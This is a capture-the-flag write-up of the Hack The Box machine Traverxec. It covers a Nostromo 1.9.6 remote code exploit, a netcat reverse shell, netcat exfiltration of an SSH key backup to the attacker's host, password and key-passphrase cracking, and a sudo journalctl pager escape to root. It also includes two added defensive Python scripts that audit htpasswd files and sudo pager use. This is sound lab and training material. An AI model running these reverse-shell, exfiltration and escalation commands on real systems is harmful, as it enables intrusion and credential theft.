Hack The Box — Traverxec — without Metasploit (TJNull’s list for OSCP)

Daniyal Ahmed
8 min read · May 29, 2023


This is my 19th write-up for Traverxec, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.

In a general penetration test or a CTF, there are usually 3 major phases involved.

  1. Enumeration and Scanning (Information Gathering).
  2. Initial Foothold.
  3. Privilege Escalation.

Let’s get started with the box!

Enumeration

In order to hack into a system we first need to gather some information about it. For that, we use Nmap to scan the target machine's ports and find out which services are running, i.e. services we can target. First let's find out which ports are open, and then we will run a detailed scan only on those ports to save time.

nmap -p- 10.129.179.144 --max-retries=2

So, we have only 2 services running: HTTP and SSH. Let's run a targeted scan on these ports.

nmap -sC -sV -A -T4 -p22,80 10.129.179.144

Here we can see a nostromo server running on port 80, version 1.9.6. Let's visit the web server and see what we have there.

We don't seem to have anything useful here. Let's run gobuster.

gobuster dir -u http://10.129.179.144/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,cgi,sh,db,jsp,html,log,txt -t 200 -k --no-error

(However, Spoiler alert: You will not find anything useful on gobuster either.)

Initial Foothold

Let's search for an exploit for Nostromo 1.9.6. I just Googled it and found this:

https://github.com/theRealFr13nd/CVE-2019-16278-Nostromo_1.9.6-RCE

Let’s try this out.

And it does work. Let's get a reverse shell quickly. First let's check if the target has netcat installed, simply by running ‘which nc’.

And it does! Let’s start a listener and get a netcat reverse shell.

python2 CVE-2019-16278.py -t 10.129.179.144 -p 80 -c "nc 10.10.16.32 4242 -e /bin/bash"

Ok, so we have an initial shell as www-data user. Let’s upgrade the shell using python pty.

python -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation

Let’s see what users we have on the target system, other than root.

cat /etc/passwd

We have a user david on the target. Let’s see what we have in his home directory.

We can’t seem to list the content… But we can get into this directory.

Let’s check the permissions for this directory.

We can't read the contents because we don't have read permission, but we can enter this directory because the execute permission is set. So, we are out of options for the home directory here.

Let's check what we have in the Nostromo config files. First we have to find where nostromo's directory is.

find / -name nostromo -type d 2>/dev/null

Nostromo directory is in /var. Let’s see what we have in there.

Let’s get into the conf directory.

Here we have the .htpasswd and nhttpd.conf files. Let's read them both and see what they contain, since we have read permission on them.

.htpasswd gives us a password hash for user david. We can try cracking it using hashcat. Let's save it for now.

nhttpd.conf gives us home directories. First, put hashcat on our attacking machine to work on that hash, and then let's search for these directories while hashcat is running in the background.

hashcat -m 500 -a 0 david.hash /usr/share/wordlists/rockyou.txt -O

(Note: remove the string ‘david’ from the start of the hash before you put that into a file [david.hash in my case])
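Two things made this hash useful to an attacker: the file was readable by the web server's unprivileged user, and the hash was md5crypt (`$1$`, hashcat mode 500), which is fast to crack. The following is an added example, not part of the original write-up, of a small audit that a defender could run over an htpasswd-style file to flag both conditions. The file contents and the hash values in it are constructed placeholders, not the box's real .htpasswd.

```python
import stat

# Constructed sample htpasswd contents (made-up hashes, not the box's real file).
SAMPLE_HTPASSWD = """\
david:$1$AbCdEfGh$0123456789abcdefghijkl
svc:$2y$10$PLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLD
legacy:{SHA}AAAAAAAAAAAAAAAAAAAAAAAAAAA=
"""

# Hash-scheme prefixes a defender should treat as weak, and why.
WEAK_SCHEMES = {
    "$1$": "md5crypt (hashcat -m 500); fast to crack offline",
    "$apr1$": "Apache md5 variant; fast to crack offline",
    "{SHA}": "unsalted SHA-1; trivially cracked",
}
# bcrypt and sha-crypt variants: acceptable when the cost/rounds are sane.
STRONG_PREFIXES = ("$2a$", "$2b$", "$2y$", "$5$", "$6$")


def audit_htpasswd(text, mode):
    """Return (subject, message) findings for an htpasswd file.

    text: the file contents; mode: its st_mode (e.g. os.stat(path).st_mode).
    """
    findings = []
    # On the box, www-data could read /var/nostromo/conf/.htpasswd; that is
    # how the hash leaked. Group/other read bits are therefore a finding.
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(("file", "readable by group/other; chmod 600 it"))
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        user, sep, hashed = line.partition(":")
        if not sep:
            findings.append((user, f"line {lineno}: malformed entry"))
            continue
        for prefix, why in WEAK_SCHEMES.items():
            if hashed.startswith(prefix):
                findings.append((user, f"weak scheme {prefix}: {why}"))
                break
        else:
            if not hashed.startswith(STRONG_PREFIXES):
                findings.append((user, "unrecognised scheme; verify manually"))
    return findings


if __name__ == "__main__":
    for subject, msg in audit_htpasswd(SAMPLE_HTPASSWD, 0o100644):
        print(f"{subject}: {msg}")
```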

Let’s search for the home directory public_www that we got from the nhttpd.conf file.

find / -name public_www -type d 2>/dev/null

I tried running the command twice but it didn't give me any result. There are two options now: either the directory doesn't exist on the system (which is highly unlikely) or it is present inside a directory that we cannot read (/home/david/ comes to mind first).

Let’s see if we have public_www inside /home/david.

cd /home/david/public_www

And yes! It’s here. It also contains a directory named protected-file-area. Let’s see what we have in there.

So, we have a compressed archive backup-ssh-identity-files.tgz. This could be interesting, judging by the name. Let's transfer it to our attacking machine using netcat. First start a listener and redirect all the output into a tgz file.

Now send the file from the target.

cat backup-ssh-identity-files.tgz | nc 10.10.16.32 4243

After a few minutes, close the connection from the attacking machine, using CTRL+C.

We have the file on our attacking machine. Let’s extract it.

gunzip ssh_id.tgz
tar -xvf ssh_id.tar

Let's read the contents of /home/david/.ssh/id_rsa.

We have an encrypted SSH private key. We need to decrypt it first in order to use it to connect over SSH.

Let's check hashcat to see if the password hash has been cracked yet.

And we have the password. Let's simply try su david on our target machine, since we have the password.

The password appears to be wrong. Let's see if we can use it as the SSH key passphrase instead.

Doesn't work here either. Let's try cracking the RSA key with john. For that, we first have to convert it into john's format.

ssh2john home/david/.ssh/id_rsa > david_john_rsa

Now let’s crack it using john.

john david_john_rsa -w /usr/share/wordlists/rockyou.txt --format=SSH

hunter is the passphrase. Let's SSH into the target as user david.

And we are in! Let's see what commands we can run with sudo.

We only have the passphrase for the SSH private key; we still don't have the password for user david. Let's see what we have in his home directory.

We have the user.txt flag here and also a directory named bin. Let’s check it.

We have a bash script server-stats.sh and a header file server-stats.head. Let's read the script first.

First it prints out the header from the server-stats.head file, and at the end it runs a command with sudo. Let's run the script and see what happens.

If we look back at the script we can notice something.

The sudo command runs after printing a string Last 5 journal log lines:

And if we see the output again.

We have this output after the statement Last 5 journal log lines:

One more thing to notice in the script is that the journalctl -n5 -unostromo.service command is run and its output is piped into /usr/bin/cat. By default journalctl sends its output to the pager less, not to cat.

According to GTFOBins we can use this technique when journalctl invokes less. Let's try this. We will copy-paste the command but leave out the /usr/bin/cat part.

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
!/bin/bash

And we are root! ;)
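The root cause here is a sudo grant on a pager-capable command: the pipe to /usr/bin/cat in the script gives no protection, because the sudo rule covers only the journalctl command and the user can simply drop the pipe. The following is an added example, not part of the original write-up, of a check a defender could run over scripts or sudoers command specs to flag that pattern, plus the corrected form (adding --no-pager). The script line is my reconstruction from the write-up's description, not the file's exact contents.

```python
import shlex

# Constructed reconstruction of the relevant server-stats.sh line (not the
# exact file contents), as the write-up describes it.
SCRIPT_LINE = "/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat"

# Tools that hand output to a pager unless told not to. Only journalctl is on
# the page; systemctl and git are common analogues with the same flag.
PAGER_TOOLS = {"journalctl": "--no-pager", "systemctl": "--no-pager", "git": "--no-pager"}


def _sudo_argv(line):
    """Split the command that sudo actually runs, ignoring anything after '|'."""
    # The pipe is ignored on purpose: sudo grants the command before it, so a
    # user can omit '| cat' and still reach the interactive pager.
    argv = shlex.split(line.split("|", 1)[0])
    if not argv or argv[0].rsplit("/", 1)[-1] != "sudo":
        return None
    i = 1  # skip sudo's own options (treat -u/-g as taking an argument)
    while i < len(argv) and argv[i].startswith("-"):
        i += 2 if argv[i] in ("-u", "-g") else 1
    return argv[i:] or None


def check_sudo_pager(line):
    """Return a finding string if `line` runs a pager-capable tool via sudo
    without disabling the pager; None otherwise."""
    cmd = _sudo_argv(line)
    if cmd is None:
        return None
    tool = cmd[0].rsplit("/", 1)[-1]
    flag = PAGER_TOOLS.get(tool)
    if flag is None or flag in cmd[1:]:
        return None
    return f"sudo {tool} without {flag}: interactive pager (less) allows a shell escape"


def harden(line):
    """Rewrite the line: drop the useless '| cat' and add the no-pager flag."""
    argv = shlex.split(line.split("|", 1)[0])
    out = []
    for arg in argv:
        out.append(arg)
        flag = PAGER_TOOLS.get(arg.rsplit("/", 1)[-1])
        if flag and flag not in argv:
            out.append(flag)
    return shlex.join(out)


if __name__ == "__main__":
    print(check_sudo_pager(SCRIPT_LINE))
    print(harden(SCRIPT_LINE))
```

Beyond the flag, the same sudo rule should be written for the exact hardened command string so that the unflagged variant is no longer permitted.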
